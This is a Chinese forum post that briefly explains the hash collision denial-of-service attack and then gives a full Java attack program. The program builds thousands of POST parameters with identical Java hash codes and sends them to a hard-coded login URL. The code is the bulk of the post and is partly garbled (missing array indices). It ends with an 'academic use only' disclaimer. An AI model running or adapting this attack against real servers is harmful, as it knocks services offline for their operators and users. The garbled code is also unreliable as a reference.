Hash Collision DoS代码
最近看Web安全,看到最近这篇文章:Hash Collision DoS 问题。原理很简单,利用现有语言服务器的hash code实现缺陷,构造大量hash code相等的字符串,做成post的参数,让服务器忙于创建和查询hash map,从而是服务器拒绝服务。详细描述可以看上面那篇文章。
我试着写了个攻击的例子代码:
import java.io.BufferedReader;import java.io.BufferedWriter;import java.io.IOException;import java.io.OutputStreamWriter;import java.net.MalformedURLException;import java.net.Socket;import java.net.URL;import java.util.ArrayList;import java.util.List;public class HashCollisionDosAttack {private final String[] srcs= {"Aa", "BB"};private List<String> getStrings(int n) {List<String> strlist = new ArrayList<String>();int round = (int) Math.pow(2, n);for (int i = 0; i < round; ++i) {strlist.add(getString(i, n));}return strlist;}private String getString(int index, int n) {String str = "";int[] bytes = getBytesOf(index, n);for (int i = 0; i < bytes.length; ++i) {str += srcs];}return str;}private int[] getBytesOf(int index, int n) {int[] bytes = new int;for (int i = 0; i < n; ++i) {bytes = 1 & (index >> i);}return bytes;}private void post(URL url, String params) {Socket socket = null;BufferedWriter bw = null;BufferedReader br= null;try {socket = new Socket(url.getHost(), url.getPort());bw = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream()));bw.write("POST " + url.getPath() + " HTTP/1.1\r\n");bw.write("Host: " + url.getHost() + "\r\n");bw.write("Content-Type: application/x-www-form-urlencoded\r\n");bw.write("Content-Length: " + params.length() + "\r\n");bw.write("Connection: Keep-Alive\r\n");bw.write("\r\n");bw.write(params);bw.flush();// br = new BufferedReader(new InputStreamReader(socket.getInputStream(),"UTF-8"));// String line;// while ((line = br.readLine()) != null) {// System.out.println(line);// }// System.out.println(params);} catch (Exception e) {e.printStackTrace();} finally {if (null != socket) {try {socket.close();} catch (IOException e) {e.printStackTrace();}}if (null != bw) {try {bw.close();} catch (IOException e) {e.printStackTrace();}}if (null != br) {try {br.close();} catch (IOException e) {e.printStackTrace();}}}}public void attack(String urlStr, int n) throws MalformedURLException {String params = "";for (int i = 1; i <= n; ++i) {params += buildParams(getStrings(i));}URL url = new URL(urlStr);post(url, params);}private String buildParams(List<String> strings) {String params = "";for (String str : strings) {params += str + "=x&";params.hashCode();}return params;}public static void main(String[] args) throws MalformedURLException {HashCollisionDosAttack attack = new HashCollisionDosAttack();attack.attack("http://frigile.com/login/login.htm", 15);}} 仅作学术交流,请勿用于非法目的。
页:
[1]